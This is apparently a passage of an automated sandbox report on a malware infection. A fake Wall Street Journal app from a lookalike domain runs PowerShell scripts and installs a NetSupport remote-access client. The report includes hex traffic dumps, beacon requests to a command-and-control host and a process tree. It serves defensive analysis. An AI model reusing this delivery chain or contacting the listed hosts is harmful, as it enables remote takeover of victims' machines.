                                                                                                                Data Ascii: Z1<j@4}sfDPwgP/%v_hj@iUi_]Z_I<\x%3s+dOaL^c1F=CP &~:w:gs%'CMARi"JZy<d6OG3Pq,jwRyE?zf`ibvilz[A9]b?
                                                                                                                2024-04-25 14:59:40 UTC16384INData Raw: 1a c3 3a 7c da 00 ee 64 c3 22 a3 85 7b c6 31 2d 25 87 78 a1 1e c4 8f 78 11 27 e2 42 3c 88 03 ca 2d 47 1c 58 1e cb 62 19 2a 21 05 96 8f 69 29 04 c7 64 63 06 f1 25 a6 5b 8c 26 2e 6e b6 21 2d c7 c0 05 12 2d ac 4f 97 9b 43 22 12 2c 9c 9b 62 c6 b2 58 0e f3 63 3e cc 83 e9 64 d6 00 17 82 10 0b 89 90 07 b2 62 09 42 33 90 01 d4 00 51 40 1b 90 08 94 02 c1 40 37 90 0f ad c0 c6 60 79 6c 33 00 6e e0 8d a4 f0 3d 4a 0a 79 ee 3f 99 bc 0b 48 a5 0c 54 3c 40 36 84 f2 29 64 d4 0c f0 75 8c c1 b2 06 28 63 a0 cc 5c 38 91 5a 4e e5 81 3f 96 ca a0 16 91 3a 72 a9 c5 90 ba 0c 70 1b b9 3c 09 d4 5c 80 44 4a 4b 6a c7 b0 96 8a a2 92 00 f7 54 88 9d cb c5 45 90 54 1d e0 c9 e6 ca c5 10 1c 69 1d 70 4d a5 72 48 dd 46 a8 25 85 d0 8c f4 67 10 9a 6c b4 e0 2f 0a e8 c8 86 50 2e e4 37 90 32 42 88
                                                                                                                Data Ascii: :|d"{1-%xx'B<-GXb*!i)dc%[&.n!--OC",bXc>dbB3Q@@7`yl3n=Jy?HT<@6)du(c\8ZN?:rp<\DJKjTETipMrHF%gl/P.72B
                                                                                                                2024-04-25 14:59:40 UTC16384INData Raw: b5 40 37 6a bc 7e 21 6a 61 fc 03 7f f4 39 36 1e cc 12 1d 8c 9d be 0a d8 85 f4 80 96 65 ac 6e 05 6d b6 11 82 52 27 a4 80 22 2b 75 e0 ef fa 00 74 16 04 36 b2 c0 6c 1e 58 cb 02 8b 79 a0 91 05 ee e4 81 65 2c 70 1f 0f dc ca 02 f3 78 60 26 0b cc e7 81 c9 2c b0 90 07 72 59 40 62 81 05 eb 45 f8 6d d6 54 63 f6 47 df 40 3b 32 c2 30 61 18 b0 9a 59 8d ac 26 56 03 83 cc 20 32 48 fd e6 73 6d fc 7c 02 63 01 a4 03 f6 63 16 82 01 45 c3 01 d6 81 47 04 fe 13 e3 ef 30 49 01 9c a5 97 38 29 e5 5f 86 f2 eb ee e4 0c 6c aa 8a 1f 07 58 e9 fa 32 1b bf 36 cb 00 e3 97 59 1d a4 d6 01 70 be df 87 72 07 d1 17 02 77 ae 13 39 c0 ab a1 fb 02 4e 3e 1e d1 ba 86 7e f2 79 c5 78 0e 66 03 cc 40 6b 61 03 6a d2 e7 7c 40 45 2d 58 0e 07 08 e4 1d 28 a3 49 cd 18 2a ba 15 2b b2 37 3c 0f 74 65 e0 15 e5
                                                                                                                Data Ascii: @7j~!ja96enmR'"+ut6lXye,px`&,rY@bEmTcG@;20aY&V 2Hsm|ccEG0I8)_lX26Yprw9N>~yxf@kaj|@E-X(I*+7<te
                                                                                                                2024-04-25 14:59:40 UTC16384INData Raw: 21 30 8c af 4e 4b fb ee 1d eb f0 d1 d1 4f c7 e3 6a 2d e3 a0 96 71 ac 96 89 b6 7e b5 2c 62 b5 b0 9e 6c 42 42 82 be eb 37 61 85 1e 45 41 d2 bb 7d 50 63 8f bc 79 3b 23 b2 bd 01 1d 3d 80 7c 3e 24 9f 87 ef 21 26 be 3f c5 11 c8 df 55 2c 56 f8 f3 bd b4 e4 29 04 8a b4 09 ef 0f 5c 51 7f bd 10 b8 8c ec 42 7a c5 53 f3 47 8b 45 0f e6 1f f9 54 02 65 ab a0 2c b3 32 94 d7 a4 5f 46 67 6f 88 e0 7c 10 46 94 45 d0 35 8b 1b d8 e7 06 26 8c c5 55 4b 7c 38 c6 a2 7e 78 18 d7 b0 02 5e 40 d5 83 a8 96 33 54 07 c2 d3 47 9f 7b 52 87 e7 04 c4 73 3c e0 b9 38 2d 77 3b c3 d2 47 17 63 ee 4b f0 86 38 c4 e5 35 b6 a4 8f 19 10 0b 3f bb c2 fd 63 6c 77 0f 7e 7b 42 51 56 23 49 79 06 85 d1 d7 23 8d 10 84 3c 9f cc 78 86 0f 00 e6 33 13 c6 9c 78 ca 86 2e 80 e2 a0 37 b3 a4 a2 9f a2 4d 3a a4 88 4d 84
                                                                                                                Data Ascii: !0NKOj-q~,blBB7aEA}Pcy;#=|>$!&?U,V)\QBzSGETe,2_Fgo|FE5&UK|8~x^@3TG{Rs<8-w;GcK85?clw~{BQV#Iy#<x3x.7M:M
                                                                                                                2024-04-25 14:59:40 UTC16384INData Raw: 1e 5d 2a 66 37 1b 67 b7 10 1f 0b ab bd 5c 36 54 ab 59 eb d3 1d 43 63 2d 52 82 9b 2f 18 da 1b ff 63 b4 30 66 89 f5 e1 a0 0e 5b ab be 8f cf b6 88 28 d5 8e a7 81 d8 d3 6b 7f f3 88 ad 5a 2b 1e 33 6a 83 14 2c 60 45 66 a2 59 fc a5 4d 9f 5b 2c 03 5f 6c 75 d1 32 00 61 55 5b 09 2e de f5 23 5d e7 96 42 7d 8f 76 a1 6f 35 6b e4 0a a3 7a 51 42 1f b4 1e c4 88 69 24 78 2e b6 5e 29 c5 25 16 a9 a0 0e b1 13 f0 47 57 a8 d4 61 ad 38 1a 9b 4f f5 5e 85 d6 98 ba b0 bf fb 4a bb 59 8f 6e 3d d5 89 88 04 1f 56 14 fc 2b ba bf c6 36 6d 70 68 e4 b4 43 c1 21 6b 24 e3 34 97 31 34 28 5c 97 04 e7 f1 69 87 42 27 80 96 52 46 d5 85 5b a3 b0 19 e4 03 19 20 12 54 54 a5 8d ef 4e 16 7b ee c7 ce 65 b3 53 8e d3 c1 69 82 f5 04 27 a2 1f b2 48 8c f5 d0 fa c1 92 6e 10 ff b5 7d c5 cd d7 dc 1f eb 44 a8
                                                                                                                Data Ascii: ]*f7g\6TYCc-R/c0f[(kZ+3j,`EfYM[,_lu2aU[.#]B}vo5kzQBi$x.^)%GWa8O^JYn=V+6mphC!k$414(\iB'RF[ TTN{eSi'Hn}D
                                                                                                                2024-04-25 14:59:40 UTC16384INData Raw: 5f b8 b8 0e 42 25 98 ea b4 f1 5c d2 1c 83 9c d1 13 c4 e8 89 91 f5 5b 7a 9d 94 23 fa 1e 6d 0f ab 8c ff 78 3a 6a 53 5f 4d 5f 99 e5 9c 32 f1 30 78 0a a7 0f 23 5e 52 1d a7 0f 08 d3 41 c0 13 87 e5 5c 93 c2 b9 7a 31 d7 e7 01 9e 2b 3a 4b 0c f3 d6 c9 59 90 b3 d6 18 c2 7d 15 93 6b 73 20 7c b8 e7 70 69 09 e1 b7 6d de 50 75 34 7c db 66 2a bf 6d b3 ea 28 de b6 09 73 14 d7 c8 d8 a5 9b e1 b7 2b b6 ef 2e 75 fb d2 03 4a fb 40 ac 8d 74 4d 0f a7 8a b7 43 6a 72 14 d2 03 60 fc 1f 7f 34 c6 ff ff f1 9d ab c6 f7 69 7f dc fe 98 a7 ee 8f 22 9e cb 09 33 d1 28 98 89 aa fc 2c d0 7f ff e5 65 9c fa 6c 31 fd ef 57 d1 c7 ae a6 cf 97 7b c2 f5 fc 2a 6e 3d fd e1 17 ab e1 bf b6 27 6e 7b 4a d4 ed a9 de 73 55 fe 7a 78 cf b7 e1 af 99 7b be 23 7f 6d 52 f5 d7 a6 ab f7 57 99 ba 7d 07 3e 88 d0 6f
                                                                                                                Data Ascii: _B%\[z#mx:jS_M_20x#^RA\z1+:KY}ks |pimPu4|f*m(s+.uJ@tMCjr`4i"3(,el1W{*n='n{JsUzx{#mRW}>o
                                                                                                                2024-04-25 14:59:40 UTC16384INData Raw: f6 42 56 57 19 2b 3c 82 81 1d 09 b4 86 10 a5 64 93 7b 94 a8 53 d3 11 06 5c 3e 65 1d e6 a7 90 3f a0 84 30 66 6a 84 4c e5 bf 13 ec b3 10 0a 92 a0 51 9e 0e d5 2f 70 87 1e 33 0b de 1d d9 7b 8e 88 fd b5 40 40 47 c2 aa 11 21 2b 0d f0 c6 b3 01 ab 28 a0 eb 1c c0 e9 51 40 55 6a ab 83 c2 f1 e7 c0 e9 a3 70 f2 f7 ea 97 91 ef 22 2a c0 40 10 5f 71 8c 1e de 9c 2d 04 36 ba 1d 88 fe 9c 56 88 e4 f5 74 4c 5e 9f 7f f2 a3 79 91 67 ce fe d6 b3 f2 a8 8c c9 e3 89 9f c8 63 f5 d9 cd 70 56 1e e7 c7 e4 51 fe 13 79 bc 78 76 13 45 36 81 4a 49 f2 46 3c f3 53 c3 4a 3b f4 8d 98 e5 d6 9a 28 c5 8c 72 75 5f 2a 23 25 00 0e 19 5d 02 cd e4 26 3e 26 13 f2 fc c6 68 72 dc 97 f2 25 95 8a de 24 3b d9 26 c0 32 d1 55 3e d9 5b 9e 1f 4d 1d 1b 2f 44 e3 d1 63 ca 8f 00 2c 13 b0 14 d4 bf e3 9e f4 c9 3e 6a
                                                                                                                Data Ascii: BVW+<d{S\>e?0fjLQ/p3{@@G!+(Q@Ujp"*@_q-6VtL^ygcpVQyxvE6JIF<SJ;(ru_*#%]&>&hr%$;&2U>[M/Dc,>j
                                                                                                                2024-04-25 14:59:40 UTC16384INData Raw: 4f 2d 16 66 56 eb 3d 85 ac 1d ab d2 31 40 2b 0e 9d 5d 46 52 ef 03 96 30 2d 12 f3 52 4c cc bf e5 11 ea e3 0b 42 a9 0f b5 62 b9 89 51 c2 c3 c6 8a 3d 48 30 c7 75 fa cb e4 0a 93 43 ce d6 54 ea 13 1a 1b 58 9d 00 28 80 92 94 5c 33 f6 17 25 32 b9 66 af c6 ff 53 d7 02 ea 10 e5 dc dd 38 31 61 98 72 ee 4f e8 4e a4 36 54 cf 53 87 ea 18 3a 54 39 f7 3e 0a 05 4b f9 14 72 a2 0d 11 24 8e 79 e0 c0 ff 80 43 ff 9f 6d 11 62 44 c5 42 c8 0b eb 1a a5 ba 3e 79 ae 54 d1 eb 59 c1 84 a6 c8 06 a5 36 5d 02 02 1d 9d bf 92 c7 fb a2 e8 79 a9 e8 47 6c f4 59 a8 8a fc a6 2d 4a 9f a2 11 f6 0a 94 6e 00 68 c0 10 0e 22 a8 ed 19 2a 56 29 e4 d9 74 62 65 ff c4 c4 4a a3 35 3d 8f d8 46 6a 4a 6d c7 8f 25 96 b6 18 32 64 c4 9f 83 58 97 a6 43 a3 e4 69 65 d4 34 38 ab 16 26 d6 65 a0 56 97 60 70 84 0c 8a
                                                                                                                Data Ascii: O-fV=1@+]FR0-RLBbQ=H0uCTX(\3%2fS81arON6TS:T9>Kr$yCmbDB>yTY6]yGlY-Jnh"*V)tbeJ5=FjJm%2dXCie48&eV`p
                                                                                                                2024-04-25 14:59:40 UTC16384INData Raw: 50 4a f1 4c df 97 13 4c 7c 24 76 a9 0f 1d 5b f9 57 1b c5 6a db a6 5d d0 07 f7 81 8e 79 ba 65 a5 d2 52 dd ba 65 a9 15 97 e7 6a ca 4c ec d7 c5 93 7c c5 a9 da a0 05 ab 3d 27 b6 d9 e2 da 0d cb a6 d8 2b d8 9c 5f 6b ef f9 6f aa 95 08 30 5d 03 c8 93 71 d7 6f c0 59 9b 68 30 a4 ab 0f 4f d2 6f 23 48 f8 06 62 5f 6b 05 fb b5 8d cf 23 83 a7 b4 88 30 b8 44 46 e4 a3 22 dd 2b ff 40 4d b9 17 74 fa 3e dd ef 6c 0d 74 b3 1a b1 61 0d 64 88 f7 82 4d ee de e4 f5 c1 08 87 c5 15 59 dd c1 74 7f c1 6f 0b 73 63 1e 8e a9 6f f9 2c 98 e0 2f d8 0d 61 73 7d 4b 9f b0 ab c5 dc ed 97 3a f7 37 26 78 f6 81 6e 6f 5b 0d 89 1a 13 0a eb fb 0a 36 c6 d4 f7 fd 60 93 b5 3e 70 7b 7d df f8 87 cd f9 41 a6 8f 9a 1b c3 a3 26 b9 1b 67 4f 95 41 fb 7f aa 74 92 b3 1b a5 d7 b5 c1 ef f0 38 f9 bc a3 e7 d0 c4 e6
                                                                                                                Data Ascii: PJLL|$v[Wj]yeRejL|='+_ko0]qoYh0Oo#Hb_k#0DF"+@Mt>ltadMYtosco,/as}K:7&xno[6`>p{}A&gOAt8


                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                67192.168.2.174980723.133.88.190443
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 15:00:22 UTC400OUTGET /73689d8a-25b4-41cf-b693-05591ed804a7-7433f7b1-9997-477b-aadc-5a6e8d233c61?fmtKxAm=Windows%20Defender&ancOgcW=GPedA&BjxYYHPLrzLmCYuBVxOLtmKj=Microsoft+Windows+10+Pro&aEoLMFrJkYQED=25&sbhadkcjUpbj=d99844e1-4599-410e-aa0d-b504c5ca3ddf&File=wsj&jAWWnA=w&zbzPFbbhcIkxLubqNgOzVPy=ab012ac2-5a34-4ac8-897c-4e2ce3936e3c HTTP/1.1
                                                                                                                User-Agent: myUserAgentHere
                                                                                                                Host: cdn40.click
                                                                                                                Connection: Keep-Alive
                                                                                                                2024-04-25 15:00:23 UTC252INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Thu, 25 Apr 2024 15:00:23 GMT
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Content-Length: 0
                                                                                                                Connection: close
                                                                                                                X-Powered-By: Express
                                                                                                                access-control-allow-origin: *
                                                                                                                ETag: W/"0-2jmj7l5rSw0yVb/vlWAYkK/YBwk"


                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                68192.168.2.174980823.133.88.190443
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 15:00:23 UTC291OUTGET /223dc805-5605-4a0b-b828-cdad1b84126e-79d39c2c-0f10-48d1-9edf-c18a784efba0?zbzPFbbhcIkxLubqNgOzVPy=ab012ac2-5a34-4ac8-897c-4e2ce3936e3c&yfDMDjOpXByWOOUikqckBA=Cannot%20bind%20argument%20to%20parameter%20'Command'%20because%20it%20is%20an%20empty%20string. HTTP/1.1
                                                                                                                Host: cdn40.click
                                                                                                                2024-04-25 15:00:23 UTC254INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Thu, 25 Apr 2024 15:00:23 GMT
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Content-Length: 19
                                                                                                                Connection: close
                                                                                                                X-Powered-By: Express
                                                                                                                access-control-allow-origin: *
                                                                                                                ETag: W/"13-jDxDK+kEkje1SmDe0R3taK+STxw"
                                                                                                                2024-04-25 15:00:23 UTC19INData Raw: 77 72 69 74 65 20 69 6e 73 74 61 6c 6c 20 65 72 72 6f 72
                                                                                                                Data Ascii: write install error


                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                69192.168.2.174980923.133.88.190443
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 15:00:23 UTC194OUTGET /974afa0a-d334-48ec-a0d4-4cc14efa730c-1d3d044a-e654-41e3-ad32-38a2934393e4?aklshdjahsjdh=25&ajhsdjhasjhd=nsp&ahsdjkasjkdh=ab012ac2-5a34-4ac8-897c-4e2ce3936e3c HTTP/1.1
                                                                                                                Host: cdn40.click
                                                                                                                2024-04-25 15:00:24 UTC252INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Thu, 25 Apr 2024 15:00:24 GMT
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Content-Length: 0
                                                                                                                Connection: close
                                                                                                                X-Powered-By: Express
                                                                                                                access-control-allow-origin: *
                                                                                                                ETag: W/"0-2jmj7l5rSw0yVb/vlWAYkK/YBwk"


                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                70192.168.2.174981023.133.88.190443
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 15:00:24 UTC291OUTGET /223dc805-5605-4a0b-b828-cdad1b84126e-79d39c2c-0f10-48d1-9edf-c18a784efba0?zbzPFbbhcIkxLubqNgOzVPy=ab012ac2-5a34-4ac8-897c-4e2ce3936e3c&yfDMDjOpXByWOOUikqckBA=Cannot%20bind%20argument%20to%20parameter%20'Command'%20because%20it%20is%20an%20empty%20string. HTTP/1.1
                                                                                                                Host: cdn40.click
                                                                                                                2024-04-25 15:00:25 UTC254INHTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Thu, 25 Apr 2024 15:00:24 GMT
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Content-Length: 19
                                                                                                                Connection: close
                                                                                                                X-Powered-By: Express
                                                                                                                access-control-allow-origin: *
                                                                                                                ETag: W/"13-jDxDK+kEkje1SmDe0R3taK+STxw"
                                                                                                                2024-04-25 15:00:25 UTC19INData Raw: 77 72 69 74 65 20 69 6e 73 74 61 6c 6c 20 65 72 72 6f 72
                                                                                                                Data Ascii: write install error


                                                                                                                Statistics

                                                                                                                CPU Usage

                                                                                                                Click to jump to process

                                                                                                                Memory Usage

                                                                                                                Click to jump to process

                                                                                                                High Level Behavior Distribution

                                                                                                                Click to dive into process behavior distribution

                                                                                                                Behavior

                                                                                                                Click to jump to process

                                                                                                                System Behavior

                                                                                                                General

                                                                                                                Target ID:0
                                                                                                                Start time:16:58:14
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://wsj.pm/
                                                                                                                Imagebase:0x7ff7d6f10000
                                                                                                                File size:3'242'272 bytes
                                                                                                                MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:1
                                                                                                                Start time:16:58:14
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2012,i,2892533121597599651,11552435548397906284,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                Imagebase:0x7ff7d6f10000
                                                                                                                File size:3'242'272 bytes
                                                                                                                MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:14
                                                                                                                Start time:16:59:16
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe" -ServerName:App.AppX9rwyqtrq9gw3wnmrap9a412nsc7145qh.mca
                                                                                                                Imagebase:0x7ff6f1be0000
                                                                                                                File size:2'483'712 bytes
                                                                                                                MD5 hash:A313FDADDB051A471645685386471EE2
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:18
                                                                                                                Start time:16:59:17
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe" /InvokerPRAID: App GroupPolicy
                                                                                                                Imagebase:0x7ff72f0d0000
                                                                                                                File size:293'376 bytes
                                                                                                                MD5 hash:2FEB69B26AB8966F050BA56641E8438A
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:20
                                                                                                                Start time:16:59:24
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe"
                                                                                                                Imagebase:0x7ff6c3640000
                                                                                                                File size:379'312 bytes
                                                                                                                MD5 hash:C55F8E39801444DEBA32F5B94B5F1EB8
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:22
                                                                                                                Start time:16:59:25
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\VFS\ProgramFilesX64\PsfRunDll64.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"PsfRunDll64.exe"
                                                                                                                Imagebase:0x7ff695d40000
                                                                                                                File size:118'704 bytes
                                                                                                                MD5 hash:8466F69926A22670DCF6515A4FC3C054
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:23
                                                                                                                Start time:16:59:25
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:Powershell.exe -ExecutionPolicy RemoteSigned -file "C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\StartingScriptWrapper.ps1" "Powershell.exe -ExecutionPolicy RemoteSigned -file '.\tOUKLPvSz.ps1'"
                                                                                                                Imagebase:0x7ff711290000
                                                                                                                File size:452'608 bytes
                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:24
                                                                                                                Start time:16:59:25
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff772470000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:25
                                                                                                                Start time:16:59:28
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -file .\tOUKLPvSz.ps1
                                                                                                                Imagebase:0x7ff711290000
                                                                                                                File size:452'608 bytes
                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:26
                                                                                                                Start time:16:59:31
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                Imagebase:0x7ff711290000
                                                                                                                File size:452'608 bytes
                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:27
                                                                                                                Start time:16:59:31
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff772470000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:28
                                                                                                                Start time:16:59:32
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.wsj.com/
                                                                                                                Imagebase:0x7ff7d6f10000
                                                                                                                File size:3'242'272 bytes
                                                                                                                MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:29
                                                                                                                Start time:16:59:32
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=404 --field-trial-handle=1996,i,16757572502617297566,4553058767684910018,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                Imagebase:0x7ff7d6f10000
                                                                                                                File size:3'242'272 bytes
                                                                                                                MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:32
                                                                                                                Start time:16:59:44
                                                                                                                Start date:25/04/2024
                                                                                                                Path:C:\ProgramData\netsupport\client\client32.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\ProgramData\netsupport\client\client32.exe"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:55'456 bytes
                                                                                                                MD5 hash:9497AECE91E1CCC495CA26AE284600B9
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000020.00000003.1941488421.00000000008BD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
